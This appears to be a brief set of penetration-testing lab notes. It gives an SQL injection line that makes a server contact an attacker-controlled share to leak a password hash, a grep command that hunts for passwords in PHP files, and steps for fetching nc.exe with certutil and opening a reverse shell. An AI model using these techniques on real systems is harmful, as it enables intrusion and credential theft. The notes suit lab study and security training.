General Tips
Getting a reverse shell via sql injection to capture password hash - https://0xrick.github.io/hack-the-box/giddy/
EXEC MASTER.sys.xp_dirtree '\10.10.14.209\fakeshare
There are many ways to phrase password - ensure you check spelling
find . -name "*.php" -print0 | xargs -0 grep -i -n "passwd"
Transferring Files to Windows Via Windows Command Execution
On Attacker PC host payload on simple webserver
Next download the file on to the victims PC via RCE using certutil.
Next setup a listener on the attacker PC
Next on the victim PC, launch the newly downloaded nc.exe and connect back to the attacker PC.
RCE Payload Workarounds:
java.lang.Runtime.exec:
Last updated